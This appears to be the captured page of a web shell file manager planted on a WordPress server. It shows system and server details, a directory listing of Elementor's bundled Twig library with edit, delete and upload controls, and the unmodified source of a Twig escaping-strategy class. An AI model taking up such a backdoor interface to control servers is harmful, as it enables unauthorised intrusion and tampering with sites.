[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor
/
vendor_prefixed
/
twig
/
twig
/
twig
/
src
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 Attribute
SET
[ DEL ]
📁 Cache
SET
[ DEL ]
📁 Error
SET
[ DEL ]
📁 Extension
SET
[ DEL ]
📁 Loader
SET
[ DEL ]
📁 Node
SET
[ DEL ]
📁 NodeVisitor
SET
[ DEL ]
📁 Profiler
SET
[ DEL ]
📁 Resources
SET
[ DEL ]
📁 Runtime
SET
[ DEL ]
📁 RuntimeLoader
SET
[ DEL ]
📁 Sandbox
SET
[ DEL ]
📁 Test
SET
[ DEL ]
📁 TokenParser
SET
[ DEL ]
📁 Util
SET
[ DEL ]
📄 Compiler.php
6,362 B
SET
[ EDIT ]
|
[ DEL ]
📄 Environment.php
26,466 B
SET
[ EDIT ]
|
[ DEL ]
📄 ExpressionParser.php
37,664 B
SET
[ EDIT ]
|
[ DEL ]
📄 ExtensionSet.php
13,596 B
SET
[ EDIT ]
|
[ DEL ]
📄 FileExtensionEscapingStrategy.php
1,463 B
SET
[ EDIT ]
|
[ DEL ]
📄 Lexer.php
19,539 B
SET
[ EDIT ]
|
[ DEL ]
📄 Markup.php
949 B
SET
[ EDIT ]
|
[ DEL ]
📄 NodeTraverser.php
1,857 B
SET
[ EDIT ]
|
[ DEL ]
📄 Parser.php
11,551 B
SET
[ EDIT ]
|
[ DEL ]
📄 Source.php
1,035 B
SET
[ EDIT ]
|
[ DEL ]
📄 Template.php
15,246 B
SET
[ EDIT ]
|
[ DEL ]
📄 TemplateWrapper.php
2,225 B
SET
[ EDIT ]
|
[ DEL ]
📄 Token.php
5,475 B
SET
[ EDIT ]
|
[ DEL ]
📄 TokenStream.php
3,408 B
SET
[ EDIT ]
|
[ DEL ]
📄 TwigFilter.php
3,370 B
SET
[ EDIT ]
|
[ DEL ]
📄 TwigFunction.php
3,128 B
SET
[ EDIT ]
|
[ DEL ]
📄 TwigTest.php
2,460 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: FileExtensionEscapingStrategy.php
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace ElementorDeps\Twig; /** * Default autoescaping strategy based on file names. * * This strategy sets the HTML as the default autoescaping strategy, * but changes it based on the template name. * * Note that there is no runtime performance impact as the * default autoescaping strategy is set at compilation time. * * @author Fabien Potencier <fabien@symfony.com> */ class FileExtensionEscapingStrategy { /** * Guesses the best autoescaping strategy based on the file name. * * @param string $name The template name * * @return string|false The escaping strategy name to use or false to disable */ public static function guess(string $name) { if (\in_array(\substr($name, -1), ['/', '\\'])) { return 'html'; // return html for directories } if (\str_ends_with($name, '.twig')) { $name = \substr($name, 0, -5); } $extension = \pathinfo($name, \PATHINFO_EXTENSION); switch ($extension) { case 'js': return 'js'; case 'css': return 'css'; case 'txt': return \false; default: return 'html'; } } }